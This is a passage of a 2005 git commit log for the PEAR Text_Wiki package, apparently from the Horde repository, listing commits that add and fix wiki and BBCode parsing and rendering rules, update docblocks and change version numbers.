 delete mode 100755 Text/Wiki/Parse/Tighten.php
 delete mode 100755 Text/Wiki/Parse/Toc.php
 delete mode 100755 Text/Wiki/Parse/Tt.php
 delete mode 100755 Text/Wiki/Parse/Url.php
 delete mode 100755 Text/Wiki/Parse/Wikilink.php

http://github.com/horde/horde/commit/e7ded309e03e4b56df0475e9037d51eff7503a05

-----------------------------------------------------------------------

commit cd7933032c5778f6ea743ddebd92eaf88ec56a5e
Author: Paul M Jones 
Date:   Tue Feb 1 03:47:37 2005 +0000

    added lookahead assertion that first character is not a colon; it was messing up such markup as Package::methodName() because a colon is allowed in the page-name.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 178618 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Interwiki.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/cd7933032c5778f6ea743ddebd92eaf88ec56a5e

-----------------------------------------------------------------------

commit af048d1a810a410633f75942eb5dff7aa0031465
Author: Paul M Jones 
Date:   Tue Feb 1 16:47:20 2005 +0000

    updated version number
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 178647 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/af048d1a810a410633f75942eb5dff7aa0031465

-----------------------------------------------------------------------

commit 87865d028510a59207d70011fcc2994ccb69f512
Author: Paul M Jones 
Date:   Tue Feb 1 16:54:49 2005 +0000

    added change notes
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 178648 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 86 ++++++++++++++++++++++++++++++-------------------------------
 1 file changed, 42 insertions(+), 44 deletions(-)

http://github.com/horde/horde/commit/87865d028510a59207d70011fcc2994ccb69f512

-----------------------------------------------------------------------

commit af006a128a274337dfa9f010d2e178a46d9b0837
Author: Paul M Jones 
Date:   Tue Feb 1 16:56:56 2005 +0000

    updated comment blocks, changed version number
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 178649 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 25 +++++++++++++++++++------
 1 file changed, 19 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/af006a128a274337dfa9f010d2e178a46d9b0837

-----------------------------------------------------------------------

commit 167d1ba3b29016c661a37dfc6ef6d03c8ee7a306
Author: Paul M Jones 
Date:   Mon Feb 14 02:12:15 2005 +0000

    fixed bug 3387 (mailto link includes javascript).  mailto links no longer include javascript window-targeting code.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 179736 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Url.php | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/167d1ba3b29016c661a37dfc6ef6d03c8ee7a306

-----------------------------------------------------------------------

commit 4c73d3fc0838227775cc14abe3d39c3783dedc0f
Author: Paul M Jones 
Date:   Mon Feb 14 02:43:15 2005 +0000

    now supports an optional extended character set for wiki page names; umlauts and
    so on should be legal if you call setParseConf('Wikilink', 'ext_chars', true).
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 179737 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Wikilink.php | 55 +++++++++++++++++++++++++-----------
 1 file changed, 39 insertions(+), 16 deletions(-)

http://github.com/horde/horde/commit/4c73d3fc0838227775cc14abe3d39c3783dedc0f

-----------------------------------------------------------------------

commit bcb44476797228072d1b50828b76b768f30dadbd
Author: Paul M Jones 
Date:   Tue Feb 22 15:10:30 2005 +0000

    added url_base conf option
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 180467 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Image.php | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/bcb44476797228072d1b50828b76b768f30dadbd

-----------------------------------------------------------------------

commit d5b44c06991527dfd9c95e640bf25dc4a6420f10
Author: Paul M Jones 
Date:   Tue Feb 22 19:12:58 2005 +0000

    added broad swaths of docblock comments
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 180486 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php                           |  6 ++++--
 Text/Wiki/Parse.php                     | 24 ++++++++++++++++++---
 Text/Wiki/Parse/Default/Anchor.php      | 24 ++++++++++++++++++++-
 Text/Wiki/Parse/Default/Blockquote.php  | 26 ++++++++++++++++++----
 Text/Wiki/Parse/Default/Bold.php        | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Break.php       | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Center.php      | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Code.php        | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Colortext.php   | 31 +++++++++++++++++++++------
 Text/Wiki/Parse/Default/Deflist.php     | 30 +++++++++++++++++++++-----
 Text/Wiki/Parse/Default/Delimiter.php   | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Embed.php       | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Emphasis.php    | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Freelink.php    | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Function.php    | 30 +++++++++++++++++++++++++-
 Text/Wiki/Parse/Default/Heading.php     | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Horiz.php       | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Html.php        | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Image.php       | 38 +++++++++++++++++++++------------
 Text/Wiki/Parse/Default/Include.php     | 26 ++++++++++++++++++----
 Text/Wiki/Parse/Default/Interwiki.php   | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Italic.php      | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/List.php        | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Newline.php     | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Paragraph.php   | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Phplookup.php   | 29 +++++++++++++++++++------
 Text/Wiki/Parse/Default/Prefilter.php   | 26 ++++++++++++++++++----
 Text/Wiki/Parse/Default/Raw.php         | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Revise.php      | 29 +++++++++++++++++++------
 Text/Wiki/Parse/Default/Strong.php      | 29 +++++++++++++++++++++----
 Text/Wiki/Parse/Default/Superscript.php | 34 ++++++++++++++++++++---------
 Text/Wiki/Parse/Default/Table.php       | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Tighten.php     | 27 +++++++++++++++++++----
 Text/Wiki/Parse/Default/Toc.php         | 28 ++++++++++++++++++++----
 Text/Wiki/Parse/Default/Tt.php          | 27 ++++++++++++++++++-----
 Text/Wiki/Parse/Default/Url.php         | 32 +++++++++++++++++++++------
 Text/Wiki/Parse/Default/Wikilink.php    | 28 +++++++++++++++++++-----
 Text/Wiki/Render.php                    | 32 +++++++++++++++++++++++++++
 Text/Wiki/Render/Plain/Prefilter.php    |  4 ++--
 Text/Wiki/Render/Xhtml/Prefilter.php    |  4 ++--
 package.xml                             |  4 ++--
 41 files changed, 898 insertions(+), 174 deletions(-)

http://github.com/horde/horde/commit/d5b44c06991527dfd9c95e640bf25dc4a6420f10

-----------------------------------------------------------------------

commit 4ce837fc9c06c64de8ce73683a8abf2369141055
Author: Paul M Jones 
Date:   Wed Feb 23 17:38:29 2005 +0000

    removed @package_version@ from sub-files, updated release info in package.xml
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 180591 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse.php                     |  4 ----
 Text/Wiki/Parse/Default/Anchor.php      |  2 --
 Text/Wiki/Parse/Default/Blockquote.php  |  2 --
 Text/Wiki/Parse/Default/Bold.php        |  2 --
 Text/Wiki/Parse/Default/Break.php       |  2 --
 Text/Wiki/Parse/Default/Center.php      |  2 --
 Text/Wiki/Parse/Default/Code.php        |  2 --
 Text/Wiki/Parse/Default/Colortext.php   |  2 --
 Text/Wiki/Parse/Default/Deflist.php     |  2 --
 Text/Wiki/Parse/Default/Delimiter.php   |  2 --
 Text/Wiki/Parse/Default/Embed.php       |  2 --
 Text/Wiki/Parse/Default/Emphasis.php    |  2 --
 Text/Wiki/Parse/Default/Freelink.php    |  2 --
 Text/Wiki/Parse/Default/Function.php    |  2 --
 Text/Wiki/Parse/Default/Heading.php     |  2 --
 Text/Wiki/Parse/Default/Horiz.php       |  2 --
 Text/Wiki/Parse/Default/Html.php        |  2 --
 Text/Wiki/Parse/Default/Image.php       |  2 --
 Text/Wiki/Parse/Default/Include.php     |  2 --
 Text/Wiki/Parse/Default/Interwiki.php   |  2 --
 Text/Wiki/Parse/Default/Italic.php      |  2 --
 Text/Wiki/Parse/Default/List.php        |  2 --
 Text/Wiki/Parse/Default/Newline.php     |  2 --
 Text/Wiki/Parse/Default/Paragraph.php   |  2 --
 Text/Wiki/Parse/Default/Phplookup.php   |  2 --
 Text/Wiki/Parse/Default/Prefilter.php   |  2 --
 Text/Wiki/Parse/Default/Raw.php         |  2 --
 Text/Wiki/Parse/Default/Revise.php      |  2 --
 Text/Wiki/Parse/Default/Strong.php      |  2 --
 Text/Wiki/Parse/Default/Superscript.php |  2 --
 Text/Wiki/Parse/Default/Table.php       |  2 --
 Text/Wiki/Parse/Default/Tighten.php     |  2 --
 Text/Wiki/Parse/Default/Toc.php         |  2 --
 Text/Wiki/Parse/Default/Tt.php          |  2 --
 Text/Wiki/Parse/Default/Url.php         |  2 --
 Text/Wiki/Parse/Default/Wikilink.php    |  2 --
 Text/Wiki/Render.php                    |  2 --
 package.xml                             | 16 +++++++++-------
 38 files changed, 9 insertions(+), 83 deletions(-)

http://github.com/horde/horde/commit/4ce837fc9c06c64de8ce73683a8abf2369141055

-----------------------------------------------------------------------

commit 57c7700dbd766f32c6996cbcf66c335307b0dcd2
Author: Paul M Jones 
Date:   Wed Feb 23 17:47:34 2005 +0000

    more change notes, changed version number
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 180595 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/57c7700dbd766f32c6996cbcf66c335307b0dcd2

-----------------------------------------------------------------------

commit 06a3568893384795451ee361a7b952a3c175da46
Author: Paul M Jones 
Date:   Thu Feb 24 17:24:56 2005 +0000

    added subscript parsing support
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 180691 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Subscript.php | 79 +++++++++++++++++++++++++++++++++++
 1 file changed, 79 insertions(+)
 create mode 100755 Text/Wiki/Parse/Default/Subscript.php

http://github.com/horde/horde/commit/06a3568893384795451ee361a7b952a3c175da46

-----------------------------------------------------------------------

commit 918f57ee7bd32c712526a86f8d6d2f70333e1f25
Author: Paul M Jones 
Date:   Thu Feb 24 17:25:50 2005 +0000

    added subscript rendering support
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 180692 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Subscript.php | 34 ++++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100755 Text/Wiki/Render/Xhtml/Subscript.php

http://github.com/horde/horde/commit/918f57ee7bd32c712526a86f8d6d2f70333e1f25

-----------------------------------------------------------------------

commit eed2121f4f1b3eb083915e65156b25346046e8f0
Author: Paul M Jones 
Date:   Thu Feb 24 17:26:29 2005 +0000

    added subscript support
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 180693 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 7 +++++++
 1 file changed, 7 insertions(+)

http://github.com/horde/horde/commit/eed2121f4f1b3eb083915e65156b25346046e8f0

-----------------------------------------------------------------------

commit 6a8bb7f1be18501f1559aeb73773e59966686668
Author: Paul M Jones 
Date:   Mon Mar 7 13:25:18 2005 +0000

    fixed bug 3004 (Wrong path for rule "image") -- patch provided by reg at dav-muz dot net
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 181536 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Image.php | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/6a8bb7f1be18501f1559aeb73773e59966686668

-----------------------------------------------------------------------

commit 85ed7afce5a6069f19411b925b942081d292eb86
Author: Paul M Jones 
Date:   Mon Mar 7 15:50:50 2005 +0000

    changed release date
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 181546 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 12 +++++-------
 1 file changed, 5 insertions(+), 7 deletions(-)

http://github.com/horde/horde/commit/85ed7afce5a6069f19411b925b942081d292eb86

-----------------------------------------------------------------------

commit 7eab08d7f40f3326b16d7186502e77708e4eed2b
Author: Paul M Jones 
Date:   Mon Mar 14 01:03:24 2005 +0000

    first stable release
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 182040 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/7eab08d7f40f3326b16d7186502e77708e4eed2b

-----------------------------------------------------------------------

commit e42f9355b1a51c2fc220747a8b9a746935701e94
Author: Paul M Jones 
Date:   Sat May 28 20:45:34 2005 +0000

    added charset and quotes support to html translation (changed internal algo
    from mapping html translation tabloes to using htmlspecialchars and htmlentities)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 187172 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml.php | 62 +++++++++++++++++++++++++++++++++++-----------
 1 file changed, 47 insertions(+), 15 deletions(-)

http://github.com/horde/horde/commit/e42f9355b1a51c2fc220747a8b9a746935701e94

-----------------------------------------------------------------------

commit 7cf2dcac658ea9d27fb81ce649342a2e47ebf313
Author: Paul M Jones 
Date:   Sat May 28 21:16:28 2005 +0000

    fixed bug 3959, "XHTML lists not rendered according W3C Standards", where
    a single newline is not enough to end a paragraph before a list.  added an extra newline
    to the returned (parsed) text.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 187175 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/List.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/7cf2dcac658ea9d27fb81ce649342a2e47ebf313

-----------------------------------------------------------------------

commit b42befca342a46c73dff91a5ed1fbf7fb5e7bb87
Author: Paul M Jones 
Date:   Sat May 28 21:17:32 2005 +0000

    as part of fixed bug 3959, "XHTML lists not rendered according W3C Standards" (where
    a single newline is not enough to end a paragraph before a list) we now output
    one less newline when a list is starting, since the parser returned an extra newline
    when parsing.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 187176 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/List.php | 4 ++++
 1 file changed, 4 insertions(+)

http://github.com/horde/horde/commit/b42befca342a46c73dff91a5ed1fbf7fb5e7bb87

-----------------------------------------------------------------------

commit 3f088ca06388a07aeedcc1b08536d7e119206a02
Author: Paul M Jones 
Date:   Sat May 28 21:30:33 2005 +0000

    added a 'collapse' key to collapse the div horizontally within a table; this
    is for aesthetics, nothing else.  'collapse' is true by default.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 187178 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Toc.php | 26 ++++++++++++++++++++------
 1 file changed, 20 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/3f088ca06388a07aeedcc1b08536d7e119206a02

-----------------------------------------------------------------------

commit eb7fc78d97aa0608d87f41d9a6368236554a5982
Author: Paul M Jones 
Date:   Sat May 28 21:33:02 2005 +0000

    parser returns an extra newline before the replacement to comply
    with the matching regex.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 187179 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Toc.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/eb7fc78d97aa0608d87f41d9a6368236554a5982

-----------------------------------------------------------------------

commit cf857ca253aedb6c215af0d992a52598e83207f7
Author: Paul M Jones 
Date:   Sat May 28 21:34:33 2005 +0000

    updated with bugfix change notes
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 187181 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/cf857ca253aedb6c215af0d992a52598e83207f7

-----------------------------------------------------------------------

commit fa50edd53f025d60a2260bbc8b2e0bdd58c1d416
Author: Paul M Jones 
Date:   Sun May 29 19:17:42 2005 +0000

    fixed bug 4175 "Wrong transform method" by generating PEAR_Error objects
    when a parse, format, or render rule cannot be found.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 187244 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 67 +++++++++++++++++++++++++++++++++++++++++++++++++----------
 1 file changed, 56 insertions(+), 11 deletions(-)

http://github.com/horde/horde/commit/fa50edd53f025d60a2260bbc8b2e0bdd58c1d416

-----------------------------------------------------------------------

commit 8ea664c3806a03f361c0a429958f118d4d05f584
Author: Paul M Jones 
Date:   Sun May 29 19:31:00 2005 +0000

    * applied feature request 4436 "Add option to getTokens to get original token indices" -- now the return array from getTokens() is keyed to the original token index number.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 187248 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/8ea664c3806a03f361c0a429958f118d4d05f584

-----------------------------------------------------------------------

commit 444973120d52356b671c3fa623711b258fd2efbd
Author: Paul M Jones 
Date:   Mon May 30 13:22:57 2005 +0000

    Fixed Bug #4473 Undefined variables in error()
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 187317 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/444973120d52356b671c3fa623711b258fd2efbd

-----------------------------------------------------------------------

commit d98056759724f8d5e94a98038f61f7177e823c5f
Author: Paul M Jones 
Date:   Mon May 30 13:37:47 2005 +0000

    fixed bug 4474 to silence calls to htmlentities and htmlspecialchars so
    that errors about charsets don't pop up, per counsel from Jan at Horde.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 187320 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml.php | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/d98056759724f8d5e94a98038f61f7177e823c5f

-----------------------------------------------------------------------

commit 9e8f1a306b6d2295987ed1081c36214e5d184a23
Author: Justin Patrin 
Date:   Sun Jul 10 20:40:20 2005 +0000

    Adding Underline rules
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190446 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Underline.php | 79 +++++++++++++++++++++++++++++++++++
 Text/Wiki/Render/Latex/Underline.php  | 30 +++++++++++++
 Text/Wiki/Render/Plain/Underline.php  | 23 ++++++++++
 Text/Wiki/Render/Xhtml/Underline.php  | 34 +++++++++++++++
 4 files changed, 166 insertions(+)
 create mode 100644 Text/Wiki/Parse/Default/Underline.php
 create mode 100644 Text/Wiki/Render/Latex/Underline.php
 create mode 100644 Text/Wiki/Render/Plain/Underline.php
 create mode 100644 Text/Wiki/Render/Xhtml/Underline.php

http://github.com/horde/horde/commit/9e8f1a306b6d2295987ed1081c36214e5d184a23

-----------------------------------------------------------------------

commit 36c88dcbec8892a54b93bfb46af38198ac3d29d5
Author: Justin Patrin 
Date:   Sun Jul 10 20:47:15 2005 +0000

    Allow recursive  sections. This won't happen often, but could be useful.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190447 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Code.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/36c88dcbec8892a54b93bfb46af38198ac3d29d5

-----------------------------------------------------------------------

commit 5054e464dcc589fb07df8db79237cf17a767fa08
Author: Justin Patrin 
Date:   Sun Jul 10 20:48:41 2005 +0000

    Adding underline to rules
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190448 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/5054e464dcc589fb07df8db79237cf17a767fa08

-----------------------------------------------------------------------

commit 298dde8ecf9b3abcc5c383259a05e223c85b5172
Author: Justin Patrin 
Date:   Tue Jul 12 04:29:48 2005 +0000

    Switching back, toggg says it doesn't work
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190536 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Code.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/298dde8ecf9b3abcc5c383259a05e223c85b5172

-----------------------------------------------------------------------

commit 9db0f7ea6ba18e0e5bdddbbc648930d50bc61329
Author: bertrand Gugger 
Date:   Tue Jul 12 13:06:42 2005 +0000

    So we can play with it (dev copy), that will constitute next test/*.phpt too,
     BBtest.txt for starting development of Text_Wiki_BBCode (not yet CS conform)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190579 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/BBtest.txt         | 45 +++++++++++++++++++++++++++++++++++++++++++++
 doc/test_Text_Wiki.php | 36 ++++++++++++++++++++++++++++++++++++
 2 files changed, 81 insertions(+)
 create mode 100644 doc/BBtest.txt
 create mode 100644 doc/test_Text_Wiki.php

http://github.com/horde/horde/commit/9db0f7ea6ba18e0e5bdddbbc648930d50bc61329

-----------------------------------------------------------------------

commit 8fbd742808d5469971d8e5f7d85a29712be82205
Author: bertrand Gugger 
Date:   Tue Jul 12 13:19:31 2005 +0000

    Creating the Text_Wiki_BBCode parser, it's a working copy, CS to be fixed
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190580 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php                   |  80 ++++++++++++++++++++
 Text/Wiki/BBCode/Parse.php             | 131 +++++++++++++++++++++++++++++++++
 Text/Wiki/BBCode/Parse/Bold.php        |  59 +++++++++++++++
 Text/Wiki/BBCode/Parse/Colortext.php   | 102 +++++++++++++++++++++++++
 Text/Wiki/BBCode/Parse/Font.php        |  77 +++++++++++++++++++
 Text/Wiki/BBCode/Parse/Italic.php      |  59 +++++++++++++++
 Text/Wiki/BBCode/Parse/Underline.php   |  59 +++++++++++++++
 Text/Wiki/BBCode/Render/Xhtml/Font.php |  62 ++++++++++++++++
 8 files changed, 629 insertions(+)
 create mode 100644 Text/Wiki/BBCode.php
 create mode 100644 Text/Wiki/BBCode/Parse.php
 create mode 100755 Text/Wiki/BBCode/Parse/Bold.php
 create mode 100755 Text/Wiki/BBCode/Parse/Colortext.php
 create mode 100644 Text/Wiki/BBCode/Parse/Font.php
 create mode 100755 Text/Wiki/BBCode/Parse/Italic.php
 create mode 100644 Text/Wiki/BBCode/Parse/Underline.php
 create mode 100644 Text/Wiki/BBCode/Render/Xhtml/Font.php

http://github.com/horde/horde/commit/8fbd742808d5469971d8e5f7d85a29712be82205

-----------------------------------------------------------------------

commit 28af2116d83581b7ed3578cb18a329b5edb80c00
Author: bertrand Gugger 
Date:   Tue Jul 12 13:42:11 2005 +0000

    Comment: We match either [color..] or [/color], will be post synchronized
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190581 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Colortext.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/28af2116d83581b7ed3578cb18a329b5edb80c00

-----------------------------------------------------------------------

commit c5a8a62e6cfa819e711da32eb1150f0fd5406b00
Author: bertrand Gugger 
Date:   Wed Jul 13 07:22:31 2005 +0000

    bad commented as // made a ?> from string becoming effective end php tag !
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190615 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Code.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/c5a8a62e6cfa819e711da32eb1150f0fd5406b00

-----------------------------------------------------------------------

commit e07febcc9f635f5adb4f1031336a90a9b3ae8a57
Author: bertrand Gugger 
Date:   Wed Jul 13 07:48:35 2005 +0000

    Made Font accepting nesting
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190616 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Font.php | 50 +++++++++++++++++++++++++++++------------
 1 file changed, 36 insertions(+), 14 deletions(-)

http://github.com/horde/horde/commit/e07febcc9f635f5adb4f1031336a90a9b3ae8a57

-----------------------------------------------------------------------

commit 8e50cd97cd3dacda87f3791f8f00aef36e03aed4
Author: bertrand Gugger 
Date:   Wed Jul 13 16:52:03 2005 +0000

    Fixed Code recursive regexp
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190630 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Code.php | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/8e50cd97cd3dacda87f3791f8f00aef36e03aed4

-----------------------------------------------------------------------

commit dad7c0aa6201242af527ac4cf65a0303b80a043c
Author: bertrand Gugger 
Date:   Thu Jul 14 08:54:30 2005 +0000

    Fixed docbook headers, hope that is conform ! Set the BBCode rules list
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190664 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 124 ++++++++++++++++++++++++++++++---------------------
 1 file changed, 74 insertions(+), 50 deletions(-)

http://github.com/horde/horde/commit/dad7c0aa6201242af527ac4cf65a0303b80a043c

-----------------------------------------------------------------------

commit 3ec63332ec8a14ceea5b853d35f53264c73a39bb
Author: bertrand Gugger 
Date:   Thu Jul 14 08:58:31 2005 +0000

    Ooops, sorry, closing bracket got eaten
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190665 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/3ec63332ec8a14ceea5b853d35f53264c73a39bb

-----------------------------------------------------------------------

commit e4fc585aac21cd245e0fab0ccef8c9d0c73ecd32
Author: bertrand Gugger 
Date:   Thu Jul 14 12:12:43 2005 +0000

    Thanks toby, opening bracket for function/method must be on next line
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190671 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/e4fc585aac21cd245e0fab0ccef8c9d0c73ecd32

-----------------------------------------------------------------------

commit bf4d802fc4dd86ea8c222b016b5f2c2b12d0a4b9
Author: bertrand Gugger 
Date:   Fri Jul 15 06:53:44 2005 +0000

    align dockblock comment stars
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190738 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/bf4d802fc4dd86ea8c222b016b5f2c2b12d0a4b9

-----------------------------------------------------------------------

commit 24af32a58c04d9913b0b6e7e8f4fcf23c594f19b
Author: Justin Patrin 
Date:   Fri Jul 15 17:46:06 2005 +0000

    Fix bug #4719, "In Latex, newline rule does not produce a new line"
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190757 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Newline.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/24af32a58c04d9913b0b6e7e8f4fcf23c594f19b

-----------------------------------------------------------------------

commit dd862e0bf8ab50a7761c09446c75eeef4d1d3351
Author: bertrand Gugger 
Date:   Sat Jul 16 04:07:24 2005 +0000

    require_once without parenthesis
